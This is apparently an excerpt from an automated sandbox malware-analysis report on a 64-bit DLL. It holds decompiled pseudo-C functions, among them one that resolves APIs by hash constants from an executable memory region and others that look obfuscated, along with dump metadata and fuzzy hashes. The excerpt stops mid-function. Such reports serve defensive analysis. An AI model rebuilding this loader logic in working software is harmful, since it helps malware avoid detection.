                          				E00007FF87FF88C08ED60(( *(_t215 + 0x1c0) | 0x000036e7) -  *((intOrPtr*)(_t215 + 0x1b8)),  *(_t215 + 0xe0) ^ r13d ^ _t172, _t180, r9d +  *(_t215 + 0x188), _t215, _t225,  *(_t215 + 0x278),  *(_t215 + 0x100) ^ 0x00002103, _t241, _t242);
                          				 *((intOrPtr*)(_t215 + 0x200)) =  *((intOrPtr*)(_t215 + 0x200)) + (r13d ^ 0x0000343a);
                          				 *((intOrPtr*)(_t215 + 0x270)) = 0x73ba78;
                          				 *((intOrPtr*)(_t215 + 0x274)) = 0x6a;
                          				_t213 =  *((intOrPtr*)(_t215 + 0xc8));
                          				 *(_t215 + 0x1b0) =  *(_t215 + 0x1b0) | _t213;
                          				 *((long long*)(_t215 + 0xc8)) = _t213 - 1;
                          				return _t231 + 0x24c;
                          			}
































                          0x7ff88c071b10
                          0x7ff88c071b2f
                          0x7ff88c071b37
                          0x7ff88c071b3e
                          0x7ff88c071b46
                          0x7ff88c071b4d
                          0x7ff88c071b55
                          0x7ff88c071b5c
                          0x7ff88c071b63
                          0x7ff88c071b69
                          0x7ff88c071b73
                          0x7ff88c071b83
                          0x7ff88c071b89
                          0x7ff88c071b93
                          0x7ff88c071ba8
                          0x7ff88c071bb1
                          0x7ff88c071bbc
                          0x7ff88c071bbf
                          0x7ff88c071bc6
                          0x7ff88c071bec
                          0x7ff88c071bfa
                          0x7ff88c071c03
                          0x7ff88c071c11
                          0x7ff88c071c17
                          0x7ff88c071c19
                          0x7ff88c071c23
                          0x7ff88c071c32
                          0x7ff88c071c3f
                          0x7ff88c071c4a
                          0x7ff88c071c4e
                          0x7ff88c071c67
                          0x7ff88c071c79
                          0x7ff88c071c91
                          0x7ff88c071c99
                          0x7ff88c071c9c
                          0x7ff88c071ca4
                          0x7ff88c071caf
                          0x7ff88c071cb5
                          0x7ff88c071cb8
                          0x7ff88c071cbe
                          0x7ff88c071cc5
                          0x7ff88c071cd3
                          0x7ff88c071cfa
                          0x7ff88c071d08
                          0x7ff88c071d11
                          0x7ff88c071d1a
                          0x7ff88c071d23
                          0x7ff88c071d27
                          0x7ff88c071d2a
                          0x7ff88c071d33
                          0x7ff88c071d3e
                          0x7ff88c071d48
                          0x7ff88c071d53
                          0x7ff88c071d67
                          0x7ff88c071d6e
                          0x7ff88c071d75
                          0x7ff88c071d8b
                          0x7ff88c071d91
                          0x7ff88c071d97
                          0x7ff88c071d9a
                          0x7ff88c071da9
                          0x7ff88c071db4
                          0x7ff88c071dc2
                          0x7ff88c071dcd
                          0x7ff88c071dd0
                          0x7ff88c071ddb
                          0x7ff88c071de6
                          0x7ff88c071de9
                          0x7ff88c071df4
                          0x7ff88c071dfd
                          0x7ff88c071e04
                          0x7ff88c071e07
                          0x7ff88c071e0f
                          0x7ff88c071e12
                          0x7ff88c071e19
                          0x7ff88c071e20
                          0x7ff88c071e24
                          0x7ff88c071e2b
                          0x7ff88c071e32
                          0x7ff88c071e39
                          0x7ff88c071e3e
                          0x7ff88c071e47
                          0x7ff88c071e51
                          0x7ff88c071e58
                          0x7ff88c071e5d
                          0x7ff88c071e66
                          0x7ff88c071e7d
                          0x7ff88c071e81
                          0x7ff88c071e85
                          0x7ff88c071e8a
                          0x7ff88c071e8f
                          0x7ff88c071e93
                          0x7ff88c071e98
                          0x7ff88c071ecd
                          0x7ff88c071ed4
                          0x7ff88c071ede
                          0x7ff88c071ee8
                          0x7ff88c071eef
                          0x7ff88c071ef9
                          0x7ff88c071f13

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                          • Instruction ID: 84db1f8b498e88d3924eed4b7ebf8eb00df27d8d1ce73f0a1853f9c306f39871
                          • Opcode Fuzzy Hash: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                          • Instruction Fuzzy Hash: C5A16932209AC186DB68CF25E0847A977A4F799B89F184139DF4E4B798CF38D591CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C0875E0(void* __rax, void* __rcx, void* __rdx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a40, intOrPtr _a56, intOrPtr _a64, intOrPtr _a80, void* _a88, intOrPtr _a96) {
                          				void* _t45;
                          				void* _t50;
                          
                          				r10d = __rcx + 0x658;
                          				r8d = __rax + 0x14f3;
                          				_a96 = r8d;
                          				_a8 = __rax + 0x3bc;
                          				_a56 = __rdx + 0x216;
                          				r9d = _t50 - 0x27b2;
                          				r11d = _t50 - 0x3bc;
                          				_a16 = r11d;
                          				_a64 = _a40 + 0x2ad;
                          				if (r9d == __rcx + 0x102f) goto 0x8c0876c5;
                          				if (r10d - _t45 - 0x1a27 < 0) goto 0x8c087994;
                          				_t46 = _a80;
                          				E00007FF87FF88C07A280();
                          				 *((long long*)(_t46 + 0x158)) =  *((intOrPtr*)(_a80 + 0x1a0));
                          				return _t50 + 0xde3;
                          			}





                          0x7ff88c0875f2
                          0x7ff88c087614
                          0x7ff88c087627
                          0x7ff88c087635
                          0x7ff88c08763c
                          0x7ff88c087643
                          0x7ff88c087651
                          0x7ff88c08765d
                          0x7ff88c087665
                          0x7ff88c087675
                          0x7ff88c087680
                          0x7ff88c087686
                          0x7ff88c087696
                          0x7ff88c0876ad
                          0x7ff88c0876c4

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                          • Instruction ID: ed6f0728f3bc09b92444f7b64ce333001fadad36f29d165d395f403c88d57189
                          • Opcode Fuzzy Hash: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                          • Instruction Fuzzy Hash: 169146736192C08BD361CF19F4457EABBA4F788788F11412ADB8A17B59DB38E958CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 55%
                          			E0000027E27ED3714540(void* __ebx, signed int __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r9) {
                          				void* __rdi;
                          				long long* _t122;
                          				long long _t123;
                          				signed long long _t127;
                          				signed long long _t128;
                          				void* _t130;
                          				void* _t151;
                          				long long _t152;
                          				signed long long _t157;
                          				void* _t159;
                          				signed long long _t165;
                          				signed long long _t166;
                          				void* _t168;
                          
                          				_t122 = __rax;
                          				 *((long long*)(_t159 + 8)) = __rbx;
                          				 *(_t159 + 0x10) = _t157;
                          				 *((long long*)(_t159 + 0x18)) = __rsi;
                          				_t155 =  *0xd371d458;
                          				_t152 = __r9;
                          				_t130 = __rcx;
                          				if (__r9 != 0) goto 0xd3714577;
                          				goto 0xd3714770;
                          				r8d = 0x10;
                          				0xd37147b0(_t168, _t165, _t151);
                          				E0000027E27ED371908C(0x9ffc4c27, __rax,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t122 == 0) goto 0xd371459f;
                          				 *_t122();
                          				_t7 = _t130 + 0x88; // 0x88
                          				_t123 = _t7;
                          				_t166 = _t165 | 0xffffffff;
                          				 *_t123 = _t123;
                          				 *((long long*)(__rcx + 0x90)) = _t123;
                          				 *((long long*)(__rcx + 0xa0)) = E0000027E27ED371825C;
                          				 *(__rcx + 0x10) = _t166;
                          				 *((long long*)(__rcx + 0xa8)) = 0x27ed3712304;
                          				 *((long long*)(__rcx + 0x98)) = 0x27ed3711730;
                          				E0000027E27ED371908C(0xdc444c2b, 0x27ed3711730,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				r13d = _t166 + 2;
                          				if (0x27ed3711730 == 0) goto 0xd3714609;
                          				r9d = 0;
                          				r8d = 0;
                          				 *((long long*)(0x27ed3711730))();
                          				goto 0xd371460b;
                          				 *((long long*)(__rcx + 0x20)) = 0x27ed3711730;
                          				if (0x27ed3711730 == 0) goto 0xd371474e;
                          				E0000027E27ED371908C(0xdc444c2b, 0x27ed3711730,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (0x27ed3711730 == 0) goto 0xd371463a;
                          				r9d = 0;
                          				r8d = 0;
                          				 *((long long*)(0x27ed3711730))();
                          				goto 0xd371463c;
                          				 *((long long*)(__rcx + 0x30)) = 0x27ed3711730;
                          				if (0x27ed3711730 == 0) goto 0xd371474e;
                          				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t157;
                          				E0000027E27ED371908C(0x3ff22481, 0x27ed3711730,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (0x27ed3711730 == 0) goto 0xd371466b;
                          				r8d = 0;
                          				 *((long long*)(0x27ed3711730))();
                          				goto 0xd371466d;
                          				 *((long long*)(__rcx + 0x28)) = 0x27ed3711730;
                          				 *(__rcx + 0x38) = 0x27ed3711730;
                          				if (0x27ed3711730 == 0) goto 0xd371474e;
                          				E0000027E27ED371240C(0, __rcx, __r9, __r9, _t155);
                          				 *_t130 = 0x27ed3711730;
                          				E0000027E27ED371908C(0x176fdd38, 0x27ed3711730,  *((intOrPtr*)(_t155 + 0x30)));
                          				if (0x27ed3711730 == 0) goto 0xd37146b0;
                          				r8d = 6;
                          				 *((long long*)(0x27ed3711730))();
                          				goto 0xd37146b3;
                          				_t127 = _t166;
                          				 *(_t130 + 0x10) = _t127;
                          				if (_t127 != _t166) goto 0xd3714714;
                          				E0000027E27ED371908C(0xb27f4910, _t127,  *((intOrPtr*)(_t155 + 0x30)));
                          				if (_t127 == 0) goto 0xd37146dd;
                          				 *_t127();
                          				goto 0xd37146df;
                          				if (0 != 0) goto 0xd371474e;
                          				E0000027E27ED371908C(0x176fdd38, _t127,  *((intOrPtr*)(_t155 + 0x30)));
                          				if (_t127 == 0) goto 0xd3714708;
                          				r8d = 6;
                          				 *_t127();
                          				goto 0xd371470b;
                          				_t128 = _t166;
                          				 *(_t130 + 0x10) = _t128;
                          				if (_t128 == _t166) goto 0xd371474e;
                          				_t32 = _t130 + 0x18; // 0x18
                          				E0000027E27ED3718470(_t128, _t130, 0x27ed3712a8c, _t130, _t155, _t157, _t32);
                          				 *(_t130 + 8) = _t128;
                          				if (_t128 == 0) goto 0xd371474e;
                          				E0000027E27ED371908C(0x38e683e4, _t128,  *((intOrPtr*)(_t155 + 0x18)));
                          				if (_t128 == 0) goto 0xd371474a;
                          				 *_t128();
                          				goto 0xd3714791;
                          				E0000027E27ED371908C(0xc06f8334, _t128,  *((intOrPtr*)(_t155 + 0x18)));
                          				if (_t128 == 0) goto 0xd3714767;
                          				 *_t128();
                          				goto 0xd371476c;
                          				if (0x7f == 0) goto 0xd3714791;
                          				E0000027E27ED3712874(_t130, _t130, _t152, _t155);
                          				if (r13d == 0) goto 0xd3714791;
                          				E0000027E27ED371908C(0x9cb92d3f, _t128,  *((intOrPtr*)(_t155 + 0x30)));
                          				if (_t128 == 0) goto 0xd3714791;
                          				 *_t128();
                          				return 0x7f;
                          			}
















                          0x27ed3714540
                          0x27ed3714540
                          0x27ed3714545
                          0x27ed371454a
                          0x27ed371455b
                          0x27ed3714564
                          0x27ed3714567
                          0x27ed371456d
                          0x27ed3714572
                          0x27ed371457b
                          0x27ed3714581
                          0x27ed371458f
                          0x27ed3714597
                          0x27ed371459d
                          0x27ed371459f
                          0x27ed371459f
                          0x27ed37145a6
                          0x27ed37145af
                          0x27ed37145b2
                          0x27ed37145c0
                          0x27ed37145ce
                          0x27ed37145d2
                          0x27ed37145e0
                          0x27ed37145eb
                          0x27ed37145f0
                          0x27ed37145f8
                          0x27ed37145fa
                          0x27ed37145fd
                          0x27ed3714605
                          0x27ed3714607
                          0x27ed371460b
                          0x27ed3714612
                          0x27ed3714621
                          0x27ed3714629
                          0x27ed371462b
                          0x27ed371462e
                          0x27ed3714636
                          0x27ed3714638
                          0x27ed371463c
                          0x27ed3714643
                          0x27ed3714649
                          0x27ed3714656
                          0x27ed371465e
                          0x27ed3714660
                          0x27ed3714667
                          0x27ed3714669
                          0x27ed371466d
                          0x27ed3714671
                          0x27ed3714678
                          0x27ed3714683
                          0x27ed371468d
                          0x27ed3714694
                          0x27ed37146a1
                          0x27ed37146a6
                          0x27ed37146ac
                          0x27ed37146ae
                          0x27ed37146b0
                          0x27ed37146b3
                          0x27ed37146ba
                          0x27ed37146c5
                          0x27ed37146cd
                          0x27ed37146d9
                          0x27ed37146db
                          0x27ed37146e1
                          0x27ed37146ef
                          0x27ed37146f7
                          0x27ed37146f9
                          0x27ed3714704
                          0x27ed3714706
                          0x27ed3714708
                          0x27ed371470b
                          0x27ed3714712
                          0x27ed3714714
                          0x27ed3714722
                          0x27ed3714727
                          0x27ed371472e
                          0x27ed3714739
                          0x27ed3714741
                          0x27ed3714748
                          0x27ed371474c
                          0x27ed3714757
                          0x27ed371475f
                          0x27ed3714761
                          0x27ed3714765
                          0x27ed371476e
                          0x27ed3714773
                          0x27ed371477a
                          0x27ed3714785
                          0x27ed371478d
                          0x27ed371478f
                          0x27ed37147af

                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 485612231-0
                          • Opcode ID: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                          • Instruction ID: 9f6e93ba1787d02af7564225743712c7e9a68852227bd42b165d004fce9e5f63
                          • Opcode Fuzzy Hash: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                          • Instruction Fuzzy Hash: 85619F3771AF00C1FF709B21A40935B62A9EB8E794F1A68798E5D437CBDE34D8018360
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00007FF87FF88C0865F0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				void* _t25;
                          
                          				_t25 = __r8;
                          				r8d = 0;
                          				 *0x8c0b4de0 = r8d;
                          				_t1 = _t25 + 1; // 0x1
                          				r9d = _t1;
                          				asm("cpuid");
                          				_v16 = r9d;
                          				_v16 = 0;
                          				_v20 = __ebx;
                          				_v12 = __edx;
                          				if (0 != 0x18001000) goto 0x8c086651;
                          				asm("xgetbv");
                          				_a8 = __rdx << 0x00000020 | __rax;
                          				r8d =  *0x8c0b4de0; // 0x1
                          				r8d =  ==  ? r9d : r8d;
                          				 *0x8c0b4de0 = r8d;
                          				 *0x8c0b4de4 = r8d;
                          				return 0;
                          			}







                          0x7ff88c0865f0
                          0x7ff88c0865f6
                          0x7ff88c0865fb
                          0x7ff88c086602
                          0x7ff88c086602
                          0x7ff88c086609
                          0x7ff88c08660b
                          0x7ff88c086613
                          0x7ff88c086619
                          0x7ff88c08661d
                          0x7ff88c086623
                          0x7ff88c086627
                          0x7ff88c086631
                          0x7ff88c08663b
                          0x7ff88c086646
                          0x7ff88c08664a
                          0x7ff88c086651
                          0x7ff88c08665f

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                          • Instruction ID: 62383b3567ce359b9a2a5c3c5d171cb362fa46e1907f0f794d501a3cb95cab48
                          • Opcode Fuzzy Hash: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                          • Instruction Fuzzy Hash: E3F06271B182A58ADFA5CF68F8026297BE0F7083C0F808439D68D8BB08DB3C9160CF04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C07E9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                          				long long _v24;
                          				signed int _t21;
                          				signed int _t24;
                          				void* _t39;
                          				char _t42;
                          				void* _t47;
                          				void* _t63;
                          				signed int _t69;
                          				signed int _t74;
                          				intOrPtr* _t89;
                          				char* _t93;
                          				char* _t94;
                          				char* _t96;
                          				char* _t98;
                          				char* _t99;
                          				void* _t100;
                          				void* _t101;
                          				void* _t119;
                          
                          				_t89 = __rax;
                          				_a8 = __rbx;
                          				_t21 =  *0x8c0b4dc8; // 0x0
                          				_v24 = __rcx;
                          				asm("movsd xmm0, [esp+0x20]");
                          				asm("movsd [edi], xmm0");
                          				__rcx[2] = 0;
                          				__rcx[1] = _t21;
                          				if ( *__rdx != 0x20) goto 0x8c07ea1a;
                          				_t93 = __rdx + 1;
                          				if ( *_t93 == 0x20) goto 0x8c07ea12;
                          				if ( *_t93 == 0x61) goto 0x8c07ea40;
                          				if ( *_t93 == 0x72) goto 0x8c07ea35;
                          				if ( *_t93 != 0x77) goto 0x8c07ec5d;
                          				 *__rcx = 0x301;
                          				goto 0x8c07ea46;
                          				 *__rcx =  *__rcx & 0;
                          				__rcx[1] = 1;
                          				goto 0x8c07ea4d;
                          				 *__rcx = 0x109;
                          				__rcx[1] = 2;
                          				_t94 = _t93 + 1;
                          				r9b = 0;
                          				r11b = 0;
                          				r10b = 0;
                          				r8b = 0;
                          				if ( *_t94 == 0) goto 0x8c07eb8b;
                          				_t42 =  *_t94;
                          				_t63 = _t42 - 0x53;
                          				if (_t63 > 0) goto 0x8c07eb0c;
                          				if (_t63 == 0) goto 0x8c07eafc;
                          				if (_t63 == 0) goto 0x8c07eb79;
                          				if (_t63 == 0) goto 0x8c07ead0;
                          				if (_t63 == 0) goto 0x8c07eac8;
                          				if (_t63 == 0) goto 0x8c07eab6;
                          				_t47 = _t42 - 0xfffffffffffffff2;
                          				if (_t63 == 0) goto 0x8c07eaad;
                          				if (_t47 != 4) goto 0x8c07ec5d;
                          				if (r10b != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				goto 0x8c07eb04;
                          				asm("bts dword [edi], 0x7");
                          				goto 0x8c07eb77;
                          				if (( *__rcx & 0x00000040) != 0) goto 0x8c07eb6d;
                          				goto 0x8c07eb75;
                          				r8b = 1;
                          				goto 0x8c07eb6d;
                          				if (r11b != 0) goto 0x8c07eb6d;
                          				_t24 =  *__rcx;
                          				r11b = 1;
                          				if ((_t24 & 0x00000002) != 0) goto 0x8c07eb6d;
                          				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
                          				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                          				goto 0x8c07eb77;
                          				_t69 = r10b;
                          				if (_t69 != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000020;
                          				r10b = 1;
                          				goto 0x8c07eb79;
                          				if (_t69 == 0) goto 0x8c07eb65;
                          				if (_t69 == 0) goto 0x8c07eb56;
                          				if (_t69 == 0) goto 0x8c07eb44;
                          				if (_t69 == 0) goto 0x8c07eb38;
                          				if (_t47 - 0x3a != 6) goto 0x8c07ec5d;
                          				if (( *__rcx & 0x0000c000) != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xe");
                          				goto 0x8c07eb75;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("btr dword [edi+0x4], 0xb");
                          				goto 0x8c07eb4e;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("bts dword [edi+0x4], 0xb");
                          				r9b = 1;
                          				goto 0x8c07eb79;
                          				_t74 =  *__rcx & 0x0000c000;
                          				if (_t74 != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xf");
                          				goto 0x8c07eb75;
                          				asm("bt eax, 0xc");
                          				if (_t74 >= 0) goto 0x8c07eb71;
                          				goto 0x8c07eb79;
                          				asm("bts eax, 0xc");
                          				if (1 != 0) goto 0x8c07ea5e;
                          				if (r8b == 0) goto 0x8c07eb93;
                          				_t96 = _t94 + __rax + 1;
                          				if ( *_t96 == 0x20) goto 0x8c07eb90;
                          				if (r8b != 0) goto 0x8c07ebaf;
                          				if ( *_t96 != 0) goto 0x8c07ec5d;
                          				__rcx[2] = 1;
                          				goto 0x8c07ec6d;
                          				r8d = 3;
                          				if (E00007FF87FF88C081B40(_t47 - 0x3a, _t96, 0x8c09ed38, _t119) != 0) goto 0x8c07ec5d;
                          				goto 0x8c07ebd5;
                          				_t98 = _t96 + 4;
                          				if ( *_t98 == 0x20) goto 0x8c07ebd2;
                          				if ( *_t98 != 0x3d) goto 0x8c07ec5d;
                          				_t99 = _t98 + 1;
                          				if ( *_t99 == 0x20) goto 0x8c07ebdf;
                          				r8d = 5;
                          				if (E00007FF87FF88C081C08(1, _t89, _t99) != 0) goto 0x8c07ec0a;
                          				_t100 = _t99 + 5;
                          				asm("bts dword [edi], 0x12");
                          				goto 0x8c07ec53;
                          				r8d = 8;
                          				if (E00007FF87FF88C081C08(1, _t89, _t100) != 0) goto 0x8c07ec2d;
                          				_t101 = _t100 + 8;
                          				asm("bts dword [edi], 0x11");
                          				goto 0x8c07ec53;
                          				r8d = 7;
                          				if (E00007FF87FF88C081C08(1, _t89, _t101) != 0) goto 0x8c07ec5d;
                          				asm("bts dword [edi], 0x10");
                          				goto 0x8c07ec53;
                          				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x8c07ec50;
                          				goto 0x8c07eb9d;
                          				_t39 = E00007FF87FF88C07E6A0(_t89);
                          				 *_t89 = 0x16;
                          				return E00007FF87FF88C07E580(_t39);
                          			}





















                          0x7ff88c07e9e0
                          0x7ff88c07e9e0
                          0x7ff88c07e9ea
                          0x7ff88c07e9fb
                          0x7ff88c07ea00
                          0x7ff88c07ea06
                          0x7ff88c07ea0a
                          0x7ff88c07ea0d
                          0x7ff88c07ea10
                          0x7ff88c07ea12
                          0x7ff88c07ea18
                          0x7ff88c07ea1d
                          0x7ff88c07ea22
                          0x7ff88c07ea27
                          0x7ff88c07ea2d
                          0x7ff88c07ea33
                          0x7ff88c07ea35
                          0x7ff88c07ea37
                          0x7ff88c07ea3e
                          0x7ff88c07ea40
                          0x7ff88c07ea46
                          0x7ff88c07ea4d
                          0x7ff88c07ea50
                          0x7ff88c07ea53
                          0x7ff88c07ea56
                          0x7ff88c07ea59
                          0x7ff88c07ea61
                          0x7ff88c07ea67
                          0x7ff88c07ea6a
                          0x7ff88c07ea6d
                          0x7ff88c07ea73
                          0x7ff88c07ea7c
                          0x7ff88c07ea85
                          0x7ff88c07ea8a
                          0x7ff88c07ea8f
                          0x7ff88c07ea91
                          0x7ff88c07ea94
                          0x7ff88c07ea99
                          0x7ff88c07eaa2
                          0x7ff88c07eaa8
                          0x7ff88c07eaab
                          0x7ff88c07eaad
                          0x7ff88c07eab1
                          0x7ff88c07eaba
                          0x7ff88c07eac3
                          0x7ff88c07eac8
                          0x7ff88c07eacb
                          0x7ff88c07ead3
                          0x7ff88c07ead9
                          0x7ff88c07eadb
                          0x7ff88c07eae0
                          0x7ff88c07eaec
                          0x7ff88c07eaf7
                          0x7ff88c07eafa
                          0x7ff88c07eafc
                          0x7ff88c07eaff
                          0x7ff88c07eb01
                          0x7ff88c07eb04
                          0x7ff88c07eb0a
                          0x7ff88c07eb0f
                          0x7ff88c07eb14
                          0x7ff88c07eb19
                          0x7ff88c07eb1e
                          0x7ff88c07eb23
                          0x7ff88c07eb30
                          0x7ff88c07eb32
                          0x7ff88c07eb36
                          0x7ff88c07eb3b
                          0x7ff88c07eb3d
                          0x7ff88c07eb42
                          0x7ff88c07eb47
                          0x7ff88c07eb49
                          0x7ff88c07eb4e
                          0x7ff88c07eb54
                          0x7ff88c07eb58
                          0x7ff88c07eb5d
                          0x7ff88c07eb5f
                          0x7ff88c07eb63
                          0x7ff88c07eb67
                          0x7ff88c07eb6b
                          0x7ff88c07eb6f
                          0x7ff88c07eb71
                          0x7ff88c07eb85
                          0x7ff88c07eb8e
                          0x7ff88c07eb90
                          0x7ff88c07eb96
                          0x7ff88c07eb9b
                          0x7ff88c07eba0
                          0x7ff88c07eba6
                          0x7ff88c07ebaa
                          0x7ff88c07ebaf
                          0x7ff88c07ebc6
                          0x7ff88c07ebd0
                          0x7ff88c07ebd2
                          0x7ff88c07ebd8
                          0x7ff88c07ebdd
                          0x7ff88c07ebdf
                          0x7ff88c07ebe5
                          0x7ff88c07ebe7
                          0x7ff88c07ebfe
                          0x7ff88c07ec00
                          0x7ff88c07ec04
                          0x7ff88c07ec08
                          0x7ff88c07ec0a
                          0x7ff88c07ec21
                          0x7ff88c07ec23
                          0x7ff88c07ec27
                          0x7ff88c07ec2b
                          0x7ff88c07ec2d
                          0x7ff88c07ec44
                          0x7ff88c07ec4a
                          0x7ff88c07ec4e
                          0x7ff88c07ec56
                          0x7ff88c07ec58
                          0x7ff88c07ec5d
                          0x7ff88c07ec62
                          0x7ff88c07ec7a

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                          • API String ID: 3215553584-2974328796
                          • Opcode ID: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                          • Instruction ID: f0b2bf7eb0a0a44d839523c32f5bb024ddbf7d8b605cf142be3c687dc01552fc
                          • Opcode Fuzzy Hash: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                          • Instruction Fuzzy Hash: 4F717E72D0E2469DFF6D4A24D65433A2E91BF237C4F149435CA3A465DDCB2EB820DB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E00007FF87FF88C08243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
                          				void* __rbp;
                          				signed int _t120;
                          				long _t134;
                          				void* _t137;
                          				void* _t139;
                          				void* _t140;
                          				signed int _t155;
                          				signed int _t156;
